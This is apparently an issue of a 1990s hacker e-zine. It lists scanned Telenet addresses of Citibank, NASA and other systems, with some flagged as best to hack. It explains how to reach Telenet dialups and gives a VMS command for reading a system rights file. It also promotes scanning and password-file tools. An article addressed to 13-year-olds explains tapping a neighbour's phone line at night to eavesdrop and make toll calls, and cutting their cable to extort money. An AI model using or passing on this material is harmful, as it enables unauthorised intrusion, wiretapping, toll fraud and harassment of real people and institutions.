Network 224155 - Prime (PROD-B), PrimOs *224157 - VCP-1000 224158 - Come Back To this one! 224159 - CDS Data Processing Support CitiCorp Center (718)248-1000 224160 - Connects The Disconnects 224161 - Vax/VMS 224162 - NUA 31109040000601, Prime - PrimOS 224163 - Prime under PrimOS 241644 - Prime under PrimOS (WINMIS) *224165 - Strange, But sorta neat server, type "?" for help. 224167 - Global Treasury Products, VAX/VMS 224168 - Global Rport From CitiCorp 224170 - Electronic Check Manager, CitiBank United Kingdom? 224172 - CitiMail Asia Pacific (CMAP) 224174 - Personal Services & Technologys Data PABX Network (212) 319-5911 for 1200bps 9600 (v.29) (516)420-4946 9600 (v.32) (516)420-4971 2400 (2120319-5946 For "Citi-Users" 224175 - "enter a for astra", Unknown *224176 - CitiCorp DECServer 500 224177 - VAX/VMS, Fairly secure. 224179 - Network? theres a big FAT Warning at front door! 224183 - Prime under PrimOS 224184 - Prime under PrimOS (PROD-C) 224186 - CitiBank Of Hong Kong *224188 - CitiTrust/WIN Gateway! Another on of strange networks.. Type "?" for help. 224191 - Unknown, CitiPC. 224193 - ":", Unknown. 224194 - CitiShare, Milwaukee, Wisconsin. System/32, VOS *224196 - Xyplex X.25 Gateway. Huge Server 224199 - Gives Garbage Then Disconnects 224200 - Connects/Disconnects 224203 - CitiBank Hong Kong - COMOS 224204 - Unknown 224205 - Prime Under PrimOS 224206 - Hong Kong Flight Depatures - NEAT! 224207 - Comunication SubSystems for Intercon. CSFI 224209 - CitiBank of Na Brunei 224210 - CitiBank, New York, Ny. System/88 224212 - Citi Master Policy BBS 224213 - Unknown 224216 - VAX/VMS 224219 - CitiBank Nordic, Stockholm 224223 - CitiBank of Singapore 224227 - Unknown 224230 - Unknown 224261 - Busy At Time Of Scan - Still Busy 224300 - Refuse Collect Calls 224503 - CitiCorp, Japan 224506 - CitiCorp - Unknown 224521 - CitiBank of Hong Kong --------------------------------------------------------------------------- Systems marked '*' are the most rewarding systems to hack in my opinion List compiled 'The Beaver') _____________________________________________ The SAOO Telenet Directory The "Thousand" Scan By The Beaver ______________________ ----------------------------------------------------------------------------- Information on Telenet: The First thing you need to do is obtain a dial up list. To do this, call 1-800-424-9494 <1200 7E1, or 1200 8N1 with high bit striping on>. Once on, you will receive a "TERMINAL=", which at this point, enter your terminal type, or just press return . You will now get a "@" prompt. From here type "c mail". At the "Username?" prompt, enter "phones" and the same for the "Password?" prompt. At this point, simply follow the directions, and you will get your local dialup. One thing I would like to note, when using the 300/1200 dialups, when you connect, simply hit return a few times. When using the 2400 dialups, you must enter "@" followed by a carriage return. For more information on Telenet, I advise you to get Hacker's Unlimited issue#1 or LOD/H Technical Journal for more information on Telenet. I did not wish to make this a text file on Telenet, but rather a directory of listings scanned by myself and fellow S.A.O.O members. These texts can be obtained via The Tower of Power BBS <668-6745> and The Speed Shop . Address Information ----------------------------------------------------------------------------- 1020 - Unknown, Freezes 1021 - Unknown, hangs 1022 - Hangs 1023 - Hangs 1024 - Hangs 1025 - Hangs 1026 - Hangs 1027 - Hangs 1028 - Hangs 1029 - Hangs 2011 - Refuse Collect Calls 2021 - PrimeNet 2022 - PrimeNet 2155 - Refuse Collect Calls 2193 - Prime 2194 - Prime 2195 - Prime 2196 - Prime 2197 - Prime 2198 - Prime 2199 - Prime 2231 - Refuse Collect Calls 2236 - Unknown... "Invalid Transaction Identification" 2241 - CitiBank <223 90118> 2242 - Global Report VAX/VMS <223 90093> 2243 - Global Report From CitiCorp <223 90000> Send Break to get menu 2244 - Prime Net <223 91054> 2246 - CitiBank Of Canada 2245 - CitiBank Of Canada - <223 90158> 2247 - Global Report From Citibank - Unknown <223 90000> 2248 - Citibanking Turkey <223 91296> 3054 - Martin Mariettia 3210 - NPSS <321 7202>. SPAN Net. 3211 - NPSS <321 2092> 3212 - NPSS <321 7202> 3213 - NPSS <321 2092> 3214 - NPSS <321 7202> 3215 - NPSS <321 7202> 3216 - NPSS <321 7202> 4045 - possible pad with no password? 4100 - MCI 4155 - Refuse Collect Calls 4157 - UnKnown - Possible Prime machine 4660 - Refuse Collect Calls 4661 - Refuse Collect Calls 4663 - Refuse Collect Calls 4664 - Refuse Collect Calls 4665 - Refuse Collect Calls 4666 - Refuse Collect Calls 4667 - Refuse Collect Calls 4668 - Refuse Collect Calls 4669 - Refuse Collect Calls 5124 - Refuse Collect Calls 5128 - Refuse Collect Calls 5650 - Refuse Collect Calls 5651 - Refuse Collect Calls 5652 - Refuse Collect Calls 5653 - Refuse Collect Calls 5654 - Refuse Collect Calls 5655 - Refuse Collect Calls 5656 - Refuse Collect Calls 5657 - Refuse Collect Calls 5658 - Refuse Collect Calls 5659 - Refuse Collect Calls 6220 - Refuse Collect Calls 6221 - Refuse Collect Calls 6222 - Refuse Collect Calls 6223 - Refuse Collect Calls 6224 - Refuse Collect Calls 6225 - Refuse Collect Calls 6226 - Refuse Collect Calls 6227 - Refuse Collect Calls 6228 - Refuse Collect Calls 6229 - Refuse Collect Calls 6260 - Refuse Collect Calls 6261 - Refuse Collect Calls 6262 - Refuse Collect Calls 6263 - Refuse Collect Calls 6264 - Refuse Collect Calls 6265 - Refuse Collect Calls 6266 - Refuse Collect Calls 6267 - Refuse Collect Calls 6268 - Refuse Collect Calls 6269 - Refuse Collect Calls 7144 - Refuse Collect Calls 7470 - UnKnown... "ENTER USERID>" - Some Private network 7471 - Same 7472 - Same 7473 - Same 7474 - Same 7475 - Same 7476 - Same 7477 - Same 7478 - Same 7479 - Same 7520 - Refuse Collect Calls 7521 - Refuse Collect Calls 7522 - Refuse Collect Calls 7523 - Refuse Collect Calls 7524 - Refuse Collect Calls 7525 - Refuse Collect Calls 7526 - Refuse Collect Calls 7527 - Refuse Collect Calls 7528 - Refuse Collect Calls 7529 - Refuse Collect Calls 7550 - Refuse Collect Calls 7551 - Refuse Collect Calls 7552 - Refuse Collect Calls 7553 - Refuse Collect Calls 7554 - Refuse Collect Calls 7555 - Refuse Collect Calls 7556 - Refuse Collect Calls 7557 - Refuse Collect Calls 7558 - Refuse Collect Calls 7559 - Refuse Collect Calls 7860 - Refuse Collect Calls 7861 - Refuse Collect Calls 7862 - Refuse Collect Calls 7863 - Refuse Collect Calls 7864 - Refuse Collect Calls 7865 - Refuse Collect Calls 7866 - Refuse Collect Calls 7867 - Refuse Collect Calls 7868 - Refuse Collect Calls 7869 - Refuse Collect Calls 7870 - Unknown Prime 7871 - UnKnown Prime 7872 - Unknown Prime Note: NUA 3210 ranges from 321X to 321XXXXXX. All of these NUA's will be NASA SPAN Networks. ------------------------------------ Basic Anarchy For The Youngsters By Penial Implant ------------------------ I have read a lot of hacking (phreaking, carding, pirating, etc.. too) computer magz and I enjoy the READING a lot, HOWEVER, I am 13 and most of the shit in the articles, while PHUN AS PHUCK to read and wish I could do, the fact is If a chemist working at a chemical outlet saw a 13 year old with a list of Sulfuric acid, Nitric acid, and glycerol (Ingredients to nitroglycerin for those unfamiliar) naturally they would get somewhat suspicious, so I have decided to submit MY article about: WHAT 13 YEAR-OLDS (OR ADULTS WHO ARE UN-WILLING TO DO THE OTHER SHIT) CAN DO THAT IS PHUN AS PHUCK 1.) Phreaking: This is a slightly technical thing but so easy it is worth it to try, Ya' know the side of your house (and everyone elses) that has all those wires running in and out of the house? well it is usually on the right side and It controls CATV (Cable), Phone services, and some other uninteresting shit (like electricity in some cases) well the obvious thing to do is use this to your advantage. 1. a.) Using The Phone Box: Once you know where the green box outside on the wall is, it is the cube that is hollow plastic and has a single nut in the center. Inside of this is the phone in and outputs of their house (for most people) there is 2 wires each attached to a screw looking thing (usually one red and the other is green). 1. a. I.) How To Use This To Your Advantage: You must build a VERY simple circuit. What you do is go to Radio Shack (or any place where you can buy phone shit, Sam's has best prices) and purchase a phone wire (at least 3ft. long but if its too short you will be confined, and too long it will be cumbersome). Then get a hold of some alligator clips (I know that Radio Shack has good prices on these helpful devices). Directions: 1st: Cut the wire in two 2nd: Remove a few inches (3"-5") of that beige/yellow jacket on the wire to expose the Red, Yellow, Green, & Black wires 3rd: Strip these wires your wire should look like this Red Modular Plug | _ Green []=======================|<_ Yellow | Black 4th: Now put an alligator clip on each of the exposed wires You have now completed the simplest hardware device of your Phreaking collection All you have to do now is buy one of those cheap phones that all the guts are contained in the headpiece and the base just has a wire running along the bottom, take the base off of the wire and take the wire out of the phone and insert the modular end of your wire into the now open port on the phone. 1. b.) Using The 'Lineman Circuit' With The Phone Box: Go out late at night (2:00am is about right) and roam around town until you find a suitable victim, preferably someone you hate When you find him/her go to the side of their house and open the box by unscrewing the nut. You may need some pliers, but 90% of the time you will be able to use your hands (Sometimes there will even be a piece of paper stating their phone number). Clip your clips onto the apprepriate post (Green to Green, and Red To Red is usually all there will be). Make sure when you do this that the hangup button is down so if (at 2:00 am) someone using the phone doesn't detect you. Then Press the 'MUTE' Buton and keep it down and release the hang up button. Check to see if there is a dialtone, if there is, we're in business if not you didn't securley clip the clips on the post (DO THAT!!!, AND start over from the 'mute' part). If you hear someone speaking it is sooooooooooooo phun to hear the conversation someone has at 2 in the morning (you could hear 1-900, drug deals all sorts of shit). 1. b. I.) What You Can Do When You Get A Dial Tone: 1. You can make toll calls 2. Prank calls (the Sherriff, Police, FBI, CIA, White House, and Kremlin are my faves) And if you have a Laptop w/modem you can call log distance boards 2.) Fucking Around With Their Cable: You can easily disconnect their cable and deprive trekkies of Star Trek or Perverts of XXX movies or whatever, and after about 2 days they will be willing to pay YOU money to get it up-and-running although the sheer joy of watching your enemies be miserable should be payment enough. And if you are a real thrill seeker, you can pump shit into their TV with a camcorder you can pretend to be a terrorist taking over the TV network or some shit like that. Submitted by Penile Implant _______________________________ Letters _____________________ From: XXXXXXXXXXXXXX To: The Beaver Subj: telnet Greetings, fellow CompuDude.... I have un problem.... I called that 1-800-424-9494 # at 12007E1 and all I got was a 'you have dialed a number that is not avalable from your calling area 205-5T' message. Any suggestions? }-----RAVEN-----> Date: 21-Sep-92 06:06 From: The Beaver To: XXXXXXXXXXXXXXX Subj: Re: telenet I will have to check it out... try one of these numbers.... 800-546-1000 564-2000 564-6000 Actually, the first one might really be 564, if not 546.. Try it, and if it don't work try the others... But considering that you will be coming in on a WATS telenet PAD, your range with be limited.. Try these other local dial ups for more range.. 1200 bps only 7E1 or 8N1 with high bit stripping on... 681-1902 though 681-1907 2400 bps, same settings as above. 561-8830 Thoughs will give you better range. If you are planing on checking out some of the NUA's given in CM#7, keep in mind that they do go bad.... Though the list should be fairly fresh and you should hit very little, to no problems. If you are planning on doing your own scans, I believe I neglected to mention, but Tscan Version 1.1i Beta will not work on slow machines. I tested it on my 386/20 and it works fine. Plus there are a few other bugs, but nothing big, and Tscan2.0i will be out within the next week or two and will have all bugs fixed, plus it is compatable with a batch more scan, scan, randomized telenet port dialing, and will run on slower machines Welp, tell me what ya find and have a blast! Chow! ---====--- < Note: Since This Writting, Tscan2.1 has been released and does support > < slower machines, but not terrible well though, and there is a bug > < on the sending of Terminal breaks if used on ports above com1 > < This is explected to be fixed on version 2.5i or the TomSwift > < hacker term.....Which ever comes first > From: XXXXXXXXXXX To: The Beaver Subject: CMASS shit Hey beav, I d/led the CMASS 7 from Spellbook earlier. Truthfully, it sucked. HAHA NOT! No really it was more than i expected! Well if you are interested in me being a part of the SAOO (cuz i am interested), then please (polite eh?) leave me whatever your supposed to leave me for application. Call XXX-XXXX voice, and if you like ill let you on to my bbs. Also, can you give me more info on how that telenet scanner works? ive read the docs, and there kinda confusin. Also i have no idea what that Phill shit is, but i copied it to my utility directory anyhow. Annnnnnnnnnnnnnnnnnnnnnnnnd... well hmm... now what was i gonna say...oh what are those numbers for the , Speed Shop, and SAOO Main BBS? they all say 904-pri-vate. There's 1 more, i cant think of. Can you give me the numbers to all the private ones if you are allowed to? Ill fill out some application if i must...i was on your bbs back in march, last thing you told me was you got C++ and it was 10 megs and you would post it, but ya hadta get a bigger drive and BOOM there goes the upper deck. Anyway, please get back to me on all of the above shit. Thanx!!!!!!!!!! From: The Beaver To: XXXXXXXXXXX Subject: CMASS#7 Welp, Tscan1.0i and Tscan1.1i are a little buggy, so I advise down- loading version 2.1i, because of the fact that it will work on slower machines if need be. I understand that the DOC's where rather confusion, and I hope the the doc's in version 2.1i will explain a little bit more, and clear up somethings....... I advise that you run it on the fastest machine you have avalible to you, so that it scan clean. If you have version 2.1i, the best way to figure out how it works is to just watch it in action. Execute Tscan2.1 and make sure that your setup is right. Once you are sure of that, go to the "Start Scan" selection.. Now it will ask for a Starting Address the rightslist, it tends to be a little messy. That is where programs like Phill, RlFilter, and RIF come in. They take out the garbage in the Rightslist. I will probably have a article in the future discussing this in more detail, but for those familar with VMS, the Rightslist can be obtained in the following way...... Type sys$common:[sysexe]rightslist.dat Don't forget to open a capture buffer! About the BBS's.................... I cannot give the fone numbers out to you, but I will point you in the right direction...... Contact Shadow Hacker, Electrode or myself about the Speed Shop . We can be reached on any UnRegNet BBS, through UnRegNet. There are a few other boards you might wish to get on, but considering that I cannot vouch for these BBS's, I probably should not release there phone numbers........ You will have to get them your own way... The following is a list of current SAOOWear Releases, that you can find on some of the BBS's previously listed. Phill v2.0 - VAX/VMS Rightslist Filter. Iwar v1.0Beta - Intelligent Wargame Dialer V1.0 Beta. determines remote OS's for you. Tscan v2.1 - SAOO Telenet Scanner V2.1 DvBoot v1.0 - Automatic window closer for DesqView UnixFlt v1.0 - Filters Unix Passwd files, leaving only the usernames behind. Noted Bugs: It seems that the "Clear Modem Buffer" routines in the beta version of Iwar v1.0 causes some machines to crash. In Tscan v2.1, there is a bug in where terminal breaks are not sent when using com ports other than com 1. This concludes yet another issue of Critical Mass. As usual, I hope you enjoyed it, and will be looking forward to the next Issue. Hopefully we can get the next issue out faster than it took to get this issue... In the next issue of Critical Mass, expect more NUA scans on Telenet, along with Down And Dirty Chemistry Part 2 and much more! - Critical Mass Tech Support -